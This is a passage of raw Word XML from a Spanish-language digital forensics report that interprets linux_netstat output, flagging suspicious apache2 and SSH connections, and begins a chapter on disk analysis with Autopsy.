CEAC6yZDBoCAABABAAADgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAU&#10;AAYACAAAACEACtEn/94AAAAGAQAADwAAAAAAAAAAAAAAAAB0BAAAZHJzL2Rvd25yZXYueG1sUEsF&#10;BgAAAAAEAAQA8wAAAH8FAAAAAA==&#10;" stroked="f">
                <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,0">
                  <w:txbxContent>
                    <w:p w14:paraId="505DD856" w14:textId="5F56A0FF" w:rsidR="00EA137B" w:rsidRPr="00962C8C" w:rsidRDefault="00EA137B" w:rsidP="00EA137B">
                      <w:pPr>
                        <w:pStyle w:val="Descripcin"/>
                        <w:rPr>
                          <w:rFonts w:cs="Arial"/>
                          <w:noProof/>
                        </w:rPr>
                      </w:pPr>
                      <w:r>
                        <w:t xml:space="preserve">Ilustración </w:t>
                      </w:r>
                      <w:fldSimple w:instr=" SEQ Ilustración \* ARABIC ">
                        <w:r w:rsidR="00117A4E">
                          <w:rPr>
                            <w:noProof/>
                          </w:rPr>
                          <w:t>43</w:t>
                        </w:r>
                      </w:fldSimple>
                      <w:r>
                        <w:t xml:space="preserve">: </w:t>
                      </w:r>
                      <w:bookmarkStart w:id="109" w:name="_Toc155782610"/>
                      <w:r>
                        <w:t>Extracto de comando linux_netstat.</w:t>
                      </w:r>
                      <w:bookmarkEnd w:id="109"/>
                    </w:p>
                  </w:txbxContent>
                </v:textbox>
                <w10:wrap type="square" anchorx="margin"/>
              </v:shape>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EFED591" w14:textId="06D6DB68" w:rsidR="00CC13F8" w:rsidRDefault="00501A15" w:rsidP="00CC13F8">
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:noProof/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251869184" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6302C61A" wp14:editId="10392569">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-324761</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3586039" cy="1181854"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="1368320390"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20390" name="Imagen 15" descr="Texto&#10;&#10;Descripción generada automáticamente"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId199">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="3586039" cy="1181854"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE1B069" w14:textId="1E890E3E" w:rsidR="00CC13F8" w:rsidRPr="00CC13F8" w:rsidRDefault="00CC13F8" w:rsidP="00CC13F8"/>
    <w:p w14:paraId="613088F8" w14:textId="6DC61EE4" w:rsidR="000C4414" w:rsidRDefault="00EE7DF8" w:rsidP="000E1874">
      <w:pPr>
        <w:ind w:left="708" w:hanging="708"/>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE7DF8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">[Anexo </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE7DF8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00EE7DF8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> REF _Ref155740457 \h  \* MERGEFORMAT </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00EE7DF8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00EE7DF8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00117A4E" w:rsidRPr="00117A4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>XIX. Comando linux_netstat.</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE7DF8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00EE7DF8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312F3CF5" w14:textId="597BB7DF" w:rsidR="00EE7DF8" w:rsidRPr="00EE7DF8" w:rsidRDefault="00EE7DF8" w:rsidP="00EE7DF8">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE7DF8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">[Anexo </w:t>
      </w:r>
      <w:r w:rsidRPr="00EE7DF8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00EE7DF8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> REF _Ref155740489 \h  \* MERGEFORMAT </w:instrText>
      </w:r>
      <w:r w:rsidRPr="00EE7DF8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00EE7DF8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidR="00117A4E" w:rsidRPr="00117A4E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
        </w:rPr>
        <w:t>XX. Resumen del comando linux_netstat.</w:t>
      </w:r>
      <w:r w:rsidRPr="00EE7DF8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="4472C4" w:themeColor="accent1"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00EE7DF8">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412266CA" w14:textId="77777777" w:rsidR="000C4414" w:rsidRPr="000C4414" w:rsidRDefault="000C4414" w:rsidP="000C4414">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Analizando las conexiones se detecta lo siguiente:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0392B66B" w14:textId="2DD352C0" w:rsidR="000C4414" w:rsidRPr="000C4414" w:rsidRDefault="000C4414" w:rsidP="000C4414">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">A parte de la gran cantidad de conexiones a </w:t>
      </w:r>
      <w:r w:rsidR="00A703AB" w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>través</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> de los puertos principales de HTTP (80) y HTTPS (443). Se observan dos conexiones realizadas a través del servicio de apache2 con id del proceso 19952.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32726E48" w14:textId="77777777" w:rsidR="000C4414" w:rsidRPr="00381329" w:rsidRDefault="000C4414" w:rsidP="000C4414">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00381329">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>TCP      ::ffff172.31.38.110:   80 ::ffff18.195.165.56:41529 CLOSE_WAIT                apache2/19952</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AFD9785" w14:textId="77777777" w:rsidR="000C4414" w:rsidRPr="00381329" w:rsidRDefault="000C4414" w:rsidP="000C4414">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00381329">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>TCP      172.31.38.110   :46384 172.31.33.128   : 8080 ESTABLISHED               apache2/19952</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C9FEC4" w14:textId="27858016" w:rsidR="000C4414" w:rsidRPr="000C4414" w:rsidRDefault="000C4414" w:rsidP="000C4414">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>1. Podemos una primera conexión que la dirección IP</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>IP (Internet Protocol): Protocolo de comunicaciones que proporciona una dirección única (IP) para cada dispositivo en la red.</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0C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> de destino es 18.195.165.56, cerrada y esperando. El cloud server usa en este caso el puerto 80. el puerto por defecto para HTTP y remite al puerto 45219 de destino. La aplicación que </w:t>
      </w:r>
      <w:r w:rsidR="00A703AB" w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>está</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> conectada es apache2 con id 19952.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D3F4799" w14:textId="4616D77A" w:rsidR="000C4414" w:rsidRPr="000C4414" w:rsidRDefault="000C4414" w:rsidP="000C4414">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">2. Podemos ver una segunda conexión que en el cloud server cuyo destino es 172.31.33.128. Esta conexión está establecida, por lo que hay comunicación. </w:t>
      </w:r>
      <w:r w:rsidR="00A703AB" w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Está</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> asociado al puerto 46384, el cual es un puerto que no tiene una asignación determinada, sin embargo, en destino tiene establecido el puerto 8080, el cual es el puerto de reserva de HTTP. La aplicación que </w:t>
      </w:r>
      <w:r w:rsidR="00A703AB" w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>está</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> conectada es la misma que la anterior, apache2 con id 19952.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FAA7A5F" w14:textId="77777777" w:rsidR="000C4414" w:rsidRPr="000C4414" w:rsidRDefault="000C4414" w:rsidP="000C4414">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    - Personalmente me resulta extraño esta conexión a un puerto de origen excesivamente alto.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AAE30E" w14:textId="77777777" w:rsidR="000C4414" w:rsidRPr="00381329" w:rsidRDefault="000C4414" w:rsidP="000C4414">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00381329">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>TCP      172.31.38.110   :   22 83.247.136.74   :16666 ESTABLISHED                  sshd/20483</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03D56DAD" w14:textId="77777777" w:rsidR="000C4414" w:rsidRPr="00381329" w:rsidRDefault="000C4414" w:rsidP="000C4414">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00381329">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="22"/>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
        <w:t>TCP      172.31.38.110   :   22 83.247.136.74   :16666 ESTABLISHED                  sshd/20576</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33581F5E" w14:textId="79E0266A" w:rsidR="000C4414" w:rsidRPr="000C4414" w:rsidRDefault="000C4414" w:rsidP="000C4414">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Me parece bastante extraño que </w:t>
      </w:r>
      <w:r w:rsidR="00A703AB" w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>haya</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2 conexiones establecidas al mismo </w:t>
      </w:r>
      <w:r w:rsidR="00A703AB" w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>puerto,</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> pero y a distintas aplicaciones, aunque reciban el mismo nombre.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="312F1C3D" w14:textId="2AF00952" w:rsidR="00A703AB" w:rsidRDefault="000C4414" w:rsidP="00501A15">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">    - Son dos conexiones al puerto 22 (SSH) a la </w:t>
      </w:r>
      <w:r w:rsidR="00A54B94" w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>IP</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>IP (Internet Protocol): Protocolo de comunicaciones que proporciona una dirección única (IP) para cada dispositivo en la red.</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0C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> 83.247.136.74 y puerto 16666. Sin </w:t>
      </w:r>
      <w:r w:rsidR="00A703AB" w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>embargo,</w:t>
      </w:r>
      <w:r w:rsidRPr="000C4414">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> la aplicación de conexión es la misma (sshd) pero con dos Id distintas (20483 y 20576).</w:t>
      </w:r>
      <w:r w:rsidR="00A703AB">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="17804210" w14:textId="2ABB15A3" w:rsidR="00A703AB" w:rsidRPr="00A703AB" w:rsidRDefault="00A703AB" w:rsidP="00A703AB">
      <w:pPr>
        <w:pStyle w:val="Ttulo1"/>
      </w:pPr>
      <w:bookmarkStart w:id="110" w:name="_Toc155782514"/>
      <w:r w:rsidRPr="00A703AB">
        <w:lastRenderedPageBreak/>
        <w:t>4.</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00A703AB">
        <w:t>Análisis del disco duro.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="110"/>
    </w:p>
    <w:p w14:paraId="2E7315D6" w14:textId="77777777" w:rsidR="00A703AB" w:rsidRPr="00A703AB" w:rsidRDefault="00A703AB" w:rsidP="00A703AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="270D2B4B" w14:textId="4EEE5425" w:rsidR="00A703AB" w:rsidRPr="00A703AB" w:rsidRDefault="00A703AB" w:rsidP="00A703AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">En este </w:t>
      </w:r>
      <w:r w:rsidR="0016269A">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>capítulo</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, como. indica su título, se va a </w:t>
      </w:r>
      <w:r w:rsidR="00373996">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>realizar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> un análisis de la información alojada en el disco duro. Para ello nos basaremos básicamente en un análisis de la información con la herramienta Autopsy</w:t>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> XE "</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863" w:rsidRPr="00D308D3">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>Autopsy: Herramienta de análisis forense digital de código abierto.</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
        </w:rPr>
        <w:instrText>"</w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> </w:instrText>
      </w:r>
      <w:r w:rsidR="00D16863">
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. La cual usaremos de manera recursiva en el presente capitulo.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="115F965F" w14:textId="77777777" w:rsidR="0053404D" w:rsidRDefault="0053404D" w:rsidP="00A703AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A2FA81E" w14:textId="16B2CCE2" w:rsidR="00A703AB" w:rsidRPr="00A703AB" w:rsidRDefault="00A703AB" w:rsidP="0053404D">
      <w:pPr>
        <w:pStyle w:val="Ttulo2"/>
      </w:pPr>
      <w:bookmarkStart w:id="111" w:name="_Toc155782515"/>
      <w:r w:rsidRPr="00A703AB">
        <w:t>4.1.</w:t>
      </w:r>
      <w:r w:rsidR="0053404D">
        <w:tab/>
      </w:r>
      <w:r w:rsidRPr="00A703AB">
        <w:t>Acciones previas al análisis del disco duro.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="111"/>
    </w:p>
    <w:p w14:paraId="415185FA" w14:textId="77777777" w:rsidR="00A703AB" w:rsidRPr="00A703AB" w:rsidRDefault="00A703AB" w:rsidP="00A703AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6F8DA40E" w14:textId="1A93577A" w:rsidR="00A703AB" w:rsidRPr="00A703AB" w:rsidRDefault="00FF4835" w:rsidP="00A703AB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Arial"/>
          <w:noProof/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wpg">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251821056" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="406D878D" wp14:editId="7AB92C0F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="margin">
                  <wp:align>right</wp:align>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>506951</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="5397534" cy="871220"/>
                <wp:effectExtent l="0" t="0" r="0" b="5080"/>
                <wp:wrapSquare wrapText="bothSides"/>
                <wp:docPr id="787859491" name="Grupo 59"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingGroup">
                    <wpg:wgp>
                      <wpg:cNvGrpSpPr/>
                      <wpg:grpSpPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="5397534" cy="871220"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="5397534" cy="871220"/>
                        </a:xfrm>
                      </wpg:grpSpPr>
                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
                        <pic:nvPicPr>
                          <pic:cNvPr id="1500604373" name="Imagen 67" descr="Texto&#10;&#10;Descripción generada automáticamente con confianza media"/>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3596640" cy="871220"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                        </pic:spPr>
                      </pic:pic>
                      <wps:wsp>
                        <wps:cNvPr id="251319942" name="Cuadro de texto 1"/>
                        <wps:cNvSpPr txBox="1"/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="3721134" y="166977"/>
                            <a:ext cx="1676400" cy="415290"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:solidFill>
                            <a:prstClr val="white"/>
                          </a:solidFill>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
